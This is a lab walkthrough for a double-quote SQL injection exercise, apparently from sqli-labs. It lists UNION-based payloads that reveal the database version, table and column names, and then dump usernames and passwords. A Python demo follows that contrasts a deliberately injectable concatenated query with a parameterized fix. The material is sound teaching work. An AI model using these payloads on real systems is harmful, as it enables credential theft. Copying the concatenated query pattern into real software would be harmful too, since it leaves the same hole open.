Less-4 GET - Error based - Double Quotes - String
1. Original page
2. ?id=1
3. ?id=1'
4.
'"1\") LIMIT 0,1' --> "1\") LIMIT 0,1
SQL:
SELECT login_name, password FROM admin WHERE id=("id") LIMIT 0,1
5. ?id=1") --+
6. ?id=1") order by 3 --+
7. Query the database version
?id=0") union select 1,version(),3 --+
8. Query the database name and user
?id=0") union select 1,database(),user() --+
9. Look up the table names
?id=0") union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),user() --+
10. Query the column names
?id=0") union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 --+
11. Query the usernames and passwords
?id=0") union select 1,group_concat(username,0x3a,password),3 from users --+
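
Why the ") breakout in steps 5-11 works, and what removes it, shown as an added example (not code from the lab): the same lookup built by string concatenation and with a bound parameter, both fed the step 7 query string. Assumptions: SQLite stands in for MySQL, the users table has three columns with constructed rows, and version() is emulated with a constructed return value.

```python
import sqlite3
from urllib.parse import parse_qs

def make_db():
    """In-memory stand-in for the lab database (constructed rows, assumed schema)."""
    conn = sqlite3.connect(":memory:")
    dqs = getattr(sqlite3, "SQLITE_DBCONFIG_DQS_DML", None)
    if dqs is not None and hasattr(conn, "setconfig"):
        conn.setconfig(dqs, True)  # accept "..." as a string literal, as MySQL does
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "constructed-pw-1"), (2, "bob", "constructed-pw-2")])
    # SQLite has no version(); emulate it so the page's step 7 input runs unchanged.
    conn.create_function("version", 0, lambda: "constructed-version")
    return conn

def get_id(query_string):
    """URL-decode the query string and return the id parameter ('+' becomes a space)."""
    return parse_qs(query_string)["id"][0]

def vulnerable_lookup(conn, query_string):
    # The id value is pasted between (" and "), so input containing ") closes the
    # string and the parenthesis, and a trailing "-- " comments out ") LIMIT 0,1.
    sql = 'SELECT * FROM users WHERE id=("' + get_id(query_string) + '") LIMIT 0,1'
    return conn.execute(sql).fetchone()

def safe_lookup(conn, query_string):
    # The id value is bound as data; quotes and parentheses in it are never parsed as SQL.
    sql = "SELECT * FROM users WHERE id=(?) LIMIT 0,1"
    return conn.execute(sql, (get_id(query_string),)).fetchone()

STEP7 = 'id=0") union select 1,version(),3 --+'  # step 7 input from the page

if __name__ == "__main__":
    db = make_db()
    for qs in ("id=1", STEP7):
        print(qs, "| concatenated:", vulnerable_lookup(db, qs), "| bound:", safe_lookup(db, qs))
```

With the bound parameter the step 7 input is compared to the id column as a plain string, matches no row, and the UNION never executes.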